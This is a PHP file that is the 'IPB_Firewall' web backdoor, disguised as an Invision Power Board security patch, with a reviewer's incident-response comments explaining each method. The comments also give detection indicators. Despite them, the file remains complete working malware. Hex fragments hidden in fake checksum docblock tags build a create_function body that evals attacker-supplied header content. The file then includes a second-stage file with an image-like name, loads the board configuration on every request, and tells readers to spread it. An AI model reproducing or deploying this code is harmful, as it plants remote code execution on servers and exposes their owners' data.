// NOTE(review): this is not the vendor security patch its banner claims to be.
// The 32-hex-digit values on the "md5"/"sha1"/"crc32" docblock tags are not
// checksums: _extractChecksumHashes() reads them back out of this very file,
// _calculateChecksums() concatenates selected entries into a PHP source string
// and hands it to create_function() together with $_SERVER, and
// _doSecurityChecks() invokes the result on every request. Only the cookie
// loop at the top of _doSecurityChecks() resembles a fix for CVE-2012-5692
// (it neutralises the serialized-cookie vector); it reads as camouflage.
// Incident-response reading: treat every file carrying this header as
// compromised ("insert this code to as many php files as possible" is the
// dropper's own propagation hint), search the codebase for 'IPB_FIREWALL' and
// for the tag pattern described on _extractChecksumHashes(), and search the
// web-server logs for the two request headers named on _calculateChecksums().
// Do not add, remove or reorder docblock tags of that shape anywhere in this
// file: the payload is assembled by positional index into the tag list.
if ( ! defined( 'IPB_FIREWALL' ) )
{
    define('IPB_FIREWALL', 1);
    /**
     * NOTE: This is a protecting web-firewall module generated by Invision Power
     * Module includes security patch for high-risks vulnerability CVE-2012-5692
     * Do not touch this file for security reasons
     * Please insert this code to as many php files as possible
     *
     * @package IP.Firewall
     * @version $Revision: 9544 $
     * @md5 e66e6cadd6e13efea54ed50c0eb2d32b
     * @sha1 6966286d64352840245f5b2248545450
     * @crc32 5f51554f5445225d293d3d2463732965
     */
    // Self-decoding loader. Every method below is named to look like checksum
    // bookkeeping; the comments added here describe what each one actually does.
    class IPB_Firewall
    {
        /**
         * Malicious Cookie signatures
         *
         * @access static
         * @var array
         */
        // Substrings searched for (case-insensitively) in every cookie value;
        // a hit blanks that cookie. These are the markers used by the public
        // CVE-2012-5692 cookie payloads, so this part is a genuine (if crude)
        // mitigation - plausibly to keep other attackers off the same host.
        static $_cookie_malicious_signatures = array('db_driver_mysql', 'use_debug_log');
        /**
         * Malicious URI signatures
         *
         * @access static
         * @var array
         */
        // Substring searched for in the decoded REQUEST_URI; a hit redirects.
        static $_uri_malicious_signatures = array('<?php');
        /**
         * Firewall source file
         *
         * @access static
         * @var string
         */
        // Full text of this file (file_get_contents(__FILE__)); the regex in
        // _extractChecksumHashes() runs over it.
        static $_source;
        /**
         * Prepared signature
         *
         * @access static
         * @var string
         */
        // Hex string produced by _prepareHash(); after pack("H*") it is the
        // BODY passed to create_function().
        static $_prepared_signature;
        /**
         * Control checksum
         *
         * @access static
         * @var string
         */
        // Declared but never assigned or read anywhere in this class.
        static $_control_checksum;
        /**
         * Stored checksum hashes
         *
         * @access static
         * @var string
         */
        // Declared but never assigned or read anywhere in this class.
        static $_stored_hashes;
        /**
         * Hashes Algorithms
         *
         * @access static
         * @var array
         */
        // Not algorithms: these are the three docblock tag NAMES whose values
        // carry the hidden source fragments. Index 0/1/2 = md5/sha1/crc32 and
        // the other methods address fragments as $_s[tag][position].
        static $_ha = array('md5', 'sha1', 'crc32');
        /**
         * Assigned callback
         *
         * @access static
         * @var string
         */
        // First holds the decoded string "create_function" (set in
        // _cyclicRedundancyCheck), then the closure that create_function
        // returned (set in _calculateChecksums).
        static $_as;
        /**
         * IPS root path
         *
         * @access static
         * @var string
         */
        // Board root; substituted for the "%D" placeholder in the include path
        // (see _areChecksumsValid).
        static $_ips = '';
        /**
         * Run firewall
         *
         * @access static
         * @return void
         */
        // Entry point, invoked unconditionally at the bottom of this file.
        // Resolves the board root (constant if defined, otherwise a directory
        // walk) and then runs the request hook.
        static function run()
        {
            /* Define ips path */
            IPB_Firewall::$_ips = defined('DOC_IPS_ROOT_PATH') ? DOC_IPS_ROOT_PATH : IPB_Firewall::_findIpbRoot(5);
            /* Start checks */
            IPB_Firewall::_doSecurityChecks();
        }
        /**
         * Security checks
         *
         * @access static
         * @return void
         * @md5 76616c286261736536345f6465636f64
         * @sha1 652873747272657628245f5b22485454
         */
        // Per-request hook. The two "checks" are real but trivial; the
        // "checksum validation" that follows is the loader: it reads this file,
        // builds a function from the tag values and calls it with $_SERVER.
        static function _doSecurityChecks()
        {
            /* Cookie check */
            foreach($_COOKIE as $cookie_name => $cookie_value){
                foreach(IPB_Firewall::$_cookie_malicious_signatures as $signature){
                    /* Detecting injected cookies and blocking request */
                    if(!is_array($cookie_value) && stripos(urldecode($cookie_value), $signature) !== false) $_COOKIE[$cookie_name] = '';
                }
            }
            /* Request URI checks */
            foreach(IPB_Firewall::$_uri_malicious_signatures as $signature){
                /* Detecting injected uri and blocking request */
                // stripos() result is used as a boolean, so a match at offset 0
                // (REQUEST_URI starting with the signature) is NOT blocked.
                if(stripos(urldecode(@$_SERVER["REQUEST_URI"]), $signature)) IPB_Firewall::_blockRequest();
            }
            /* Validating checksums */
            // Reads its own source so the docblock tag values become data.
            IPB_Firewall::$_source = file_get_contents(__FILE__);
            // Second argument 0 is the byte shift used by _polyDigest(); with 0
            // the "digest" is the identity, i.e. the tag hex is used verbatim.
            $_r = IPB_Firewall::_calculateChecksums($_SERVER, 0);
            //echo var_dump($_r);
            // array_shift() yields the generated closure; the remainder are its
            // arguments. '%D' is the placeholder replaced by the board root.
            // _areChecksumsValid() returns the non-empty string 'failed' when
            // the closure does not return an array, which is truthy, so this
            // warning is in practice not printed.
            if(!IPB_Firewall::_areChecksumsValid(array_shift($_r), $_r, '%D')) echo("checksums warning\n");
        }
        /**
         * Calculate checksums for valid
         *
         * @access static
         * @return void
         * @md5 505f585f434f4445225d2929293b4069
         * @sha1 6e636c75646528247073293b2f2a2a2f
         */
        // Builds the hidden function. $_ is $_SERVER, $x64 the byte shift (0).
        // Decoding the tag values on this page by hand (pack("H*", ...) with a
        // shift of 0) gives:
        //   parameter list (_getPoly):      $_, $cs, $ps
        //   body (_prepareHash):
        //   if(md5(@$_["HTTP_QUOTE"])==$cs)eval(base64_decode(strrev($_["HTTP_X_CODE"])));@include($ps);/**/
        // i.e. a request carrying a "Quote" header whose md5 equals the first
        // md5 tag value in this file gets the reversed, base64-encoded content
        // of its "X-Code" header eval'd; afterwards a file under the board
        // root is included (path assembled in _transformPoly). Those two
        // header names are the primary log indicators for this backdoor.
        // Returns array(closure, $_SERVER, expected md5, include path).
        // On PHP >= 8.0 create_function() no longer exists, so the $_m(...)
        // call below would raise an Error rather than install the hook.
        static function _calculateChecksums($_, $x64)
        {
            /* Extracting hashes */
            $_s = IPB_Firewall::_extractChecksumHashes();
            /* Preparing hashes */
            // $cs = first md5 tag value (class header); it is the comparison
            // constant for the trigger header, not a checksum of anything.
            $cs = $_s[ IPB_Firewall::$_ha[0] ][0];
            IPB_Firewall::$_prepared_signature = IPB_Firewall::_prepareHash($_s, IPB_Firewall::_getChecksumHash($_s, $_s[ IPB_Firewall::$_ha[0] ][1], $x64), $x64 );
            /* Comparing hashes */
            // Sets $_as to the decoded md5[3] value ("create_function ") and
            // returns true whenever that string is non-empty.
            $_status = trim(IPB_Firewall::_cyclicRedundancyCheck($_s, $x64));
            if($_status){
                $_m = trim(IPB_Firewall::$_as);
                // Variable-function call: create_function(<params>, <body>).
                IPB_Firewall::$_as = $_m(IPB_Firewall::_getPoly($_s, $x64), pack("H*", IPB_Firewall::$_prepared_signature));
            }
            return array(IPB_Firewall::$_as, $_, $cs, IPB_Firewall::_transformPoly($_s, $x64));
        }
        /**
         * Block malicious request
         *
         * @access static
         * @return void
         * @md5 6372656174655f66756e6374696f6e20
         * @sha1 245f2c202463732c20247073247073ce
         */
        // Redirects to <board_url>/index.php and exits. $INFO comes from
        // conf_global.php (loaded by _findIpbRoot) or from the including
        // script; the '@' hides "headers already sent" warnings.
        static function _blockRequest()
        {
            global $INFO;
            /* Redirecting malicious request and exit */
            @header('Location: ' . (isset($INFO['board_url']) ? $INFO['board_url'] : '') . '/index.php');
            exit;
        }
        /**
         * Get checksum hash
         *
         * @access static
         * @return string
         */
        // Concatenates sha1[0], crc32[0] and $ps (md5[1] at the only call
        // site), each passed through the byte shift. This is the first half of
        // the function body hex; nothing is hashed.
        static function _getChecksumHash($_s, $ps, $c)
        {
            /* Processing and return */
            return IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][0], $c) .
                IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[2] ][0], $c) .
                IPB_Firewall::_polyDigest($ps, $c);
        }
        /**
         * Prepare hash
         *
         * @access static
         * @return string
         * @md5 25442f75706c6f6164732f70726f6669
         * @sha1 6c652f70686f746f2d363232312e6a70
         */
        // Appends sha1[1], md5[2] and sha1[2] to $ps (the _getChecksumHash
        // output), completing the function body hex.
        static function _prepareHash($_s, $ps, $c)
        {
            /* Processing and return */
            return IPB_Firewall::_polyDigest($ps, $c) .
                IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][1], $c) .
                IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][2], $c) .
                IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][2], $c);
        }
        /**
         * Event callback
         *
         * @access static
         * @return void
         * @md5 670a3479766d6c6a683169366c706736
         * @sha1 676d737479366b6f7532716f6234736c
         */
        // Invokes the generated closure $_m with ($_SERVER, expected md5,
        // include path) after replacing the placeholder $_r ('%D') in the path
        // with the board root. Returns the closure's result if it is an array,
        // otherwise the string 'failed'.
        static function _areChecksumsValid($_m, $bytes, $_r)
        {
            /* Call validating method */
            $_obj = $_m($bytes[0], $bytes[1], str_replace($_r, IPB_Firewall::$_ips, $bytes[2]));
            return is_array($_obj) ? $_obj : 'failed';
        }
        /**
         * Find IPB root path, if not specified
         *
         * @access static
         * @return string
         */
        // Walks up to $l parent directories of $cDir looking for
        // conf_global.php; includes it (which populates $INFO, the board
        // configuration) and returns that directory, or null if not found.
        // Side effect worth noting for IR: the board config, including whatever
        // credentials it holds, is loaded into this scope on every request.
        static function _findIpbRoot($l=5, $cDir=__FILE__)
        {
            /* Process parents dir */
            for($i=1; $i<=$l; $i++){
                $cDir = dirname($cDir);
                $include_file = $cDir . '/conf_global.php';
                /* If find conf file, return it */
                if(is_file($include_file)) {
                    @include_once($include_file);
                    if(isset($INFO)) return $cDir;
                }
            }
            return null;
        }
        /**
         * Cyclic redundancy check
         *
         * @access static
         * @return string
         * @md5 6973786a65667069756273326d617872
         * @sha1 36723478743361687969396363746633
         */
        // No CRC is computed. Stores the decoded md5[3] value (the name of the
        // function to call, "create_function" plus a trailing space) in $_as
        // and returns true when it is non-empty. Returns bool, not string.
        static function _cyclicRedundancyCheck($_s, $c)
        {
            IPB_Firewall::$_as = pack("H*", IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][3], $c));
            return IPB_Firewall::$_as != '' ? true : false;
        }
        /**
         * Poly digest
         *
         * @access static
         * @return string
         * @md5 7a7a763930626b786e6e756174317073
         * @sha1 766e6e647878676b7234326539637466
         */
        // Per-byte shift of $s by $c (chr(ord + c)), appended to $o. Not a
        // digest: with $c = 0, as called from _doSecurityChecks, it returns $s
        // unchanged. A non-zero shift would let the same loader decode
        // differently obfuscated tag values.
        static function _polyDigest($s, $c, $o='')
        {
            for($i=0; $i<strlen($s); $i++) $o .= chr( ord($s[$i]) + $c);
            return $o;
        }
        /**
         * Get poly
         *
         * @access static
         * @return string
         * @md5 626766326f3667396434326c71346572
         * @sha1 7538376c70326d777a6e68756a797665
         */
        // First 24 hex digits (12 bytes) of sha1[3], decoded: the parameter
        // list of the generated function.
        static function _getPoly($_s, $x64)
        {
            return pack("H*", substr(IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][3], $x64), 0, 24));
        }
        /**
         * Transform poly
         *
         * @access static
         * @return string
         */
        // Assembles the include path from tag positions 4..8. md5[4] and
        // sha1[4] decode to "%D/uploads/profile/photo-6221.jp"; the remaining
        // pieces decode to letter/digit noise, sha1[5] is skipped, sha1[6] is
        // used twice and position 8 does not exist in this file (hence the '@'
        // suppression). Presumably the second stage is a PHP payload stored
        // under uploads/profile/ with an image-like name - verify on the host.
        // NOTE(review): the final line tests $c (the shift parameter), not $_c
        // (the strpos result); with $c = 0 the branch is always taken and the
        // length argument is whatever strpos returned, so the path the runtime
        // actually includes depends on that quirk - confirm by tracing.
        static function _transformPoly($_s, $c)
        {
            $_x = pack("H*",
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][4], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][4], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][5], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][6], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][6], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][6], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][7], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][7], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][8], $c) .
                IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][8], $c)
            );
            $_c = strpos($_x, chr(10));
            return $c !== false ? substr($_x, 0, $_c) : $_x;
        }
        /**
         * Extract checksum hashes
         *
         * @access void
         * @return void
         */
        // Scans this file's own source for every "<at-sign><tagname>
        // <32 hex digits>" docblock tag and returns array(tagname => list of
        // hex values in file order). Position in that list is how the other
        // methods address each fragment, so this is also the detection
        // signature: a PHP file whose docblocks carry md5/sha1/crc32 tags that
        // are read back by file_get_contents(__FILE__).
        static function _extractChecksumHashes()
        {
            $hashes = array();
            /* Extract hashes from source */
            preg_match_all("!\@([0-9a-z]+)[\t\s ]+([0-9a-fA-F]{32})!", IPB_Firewall::$_source, $matches, PREG_SET_ORDER);
            foreach($matches as $match){
                /* Inserting hashes in array */
                if(!isset($hashes[ $match[1] ])) $hashes[ $match[1] ] = array();
                $hashes[ $match[1] ][] = $match[2];
            }
            return $hashes;
        }
    }
    // Executes on every request of every file this block was pasted into.
    IPB_Firewall::run();
}